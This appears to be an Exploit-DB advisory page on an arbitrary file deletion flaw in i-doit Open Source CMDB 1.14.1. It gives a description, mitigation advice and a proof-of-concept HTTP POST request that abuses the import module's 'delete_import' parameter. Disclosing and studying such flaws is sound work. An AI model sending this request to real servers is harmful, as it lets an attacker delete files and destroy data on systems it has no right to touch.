i-doit Open Source CMDB 1.14.1 - Arbitrary File Deletion

vendor:

i-doit Open Source CMDB

by:

Besim ALTINOK

7.5

CVSS

HIGH

Arbitrary File Deletion

CWE

Product Name: i-doit Open Source CMDB

Affected Version From: v1.14.1

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Xampp

2020

i-doit Open Source CMDB 1.14.1 – Arbitrary File Deletion

The i-doit Open Source CMDB version 1.14.1 is vulnerable to arbitrary file deletion. An attacker can exploit this vulnerability by sending a specially crafted HTTP POST request to the import module with the 'delete_import' parameter set to the filename they want to delete from the server. This allows an attacker to delete any file on the server, leading to potential data loss or unauthorized access.

Mitigation:

The vendor has not provided a patch or mitigation for this vulnerability. It is recommended to update to a newer version of i-doit Open Source CMDB if available. Additionally, access to the import module should be restricted to trusted users only.

Source

Exploit-DB raw data:

# Exploit Title: i-doit Open Source CMDB 1.14.1 - Arbitrary File Deletion
# Date: 2020-05-02
# Author: Besim ALTINOK
# Vendor Homepage: https://www.i-doit.org/
# Software Link: https://sourceforge.net/projects/i-doit/
# Version: v1.14.1
# Tested on: Xampp
# Credit: İsmail BOZKURT

--------------------------------------------------------------------------------------------------

Vulnerable Module ---> Import Module
Vulnerable parameter ---> delete_import
-----------
PoC
-----------

POST /idoit/?moduleID=50&param=1&treeNode=501&mNavID=2 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 ******************************
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/idoit/?moduleID=50&param=1&treeNode=501&mNavID=2
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7.3
Content-type: application/x-www-form-urlencoded; charset=UTF-8
X-i-doit-Tenant-Id: 1
Content-Length: 30
DNT: 1
Connection: close
Cookie: PHPSESSID=bf21********************************68b8

delete_import=Type the filename, you want to delete from the server here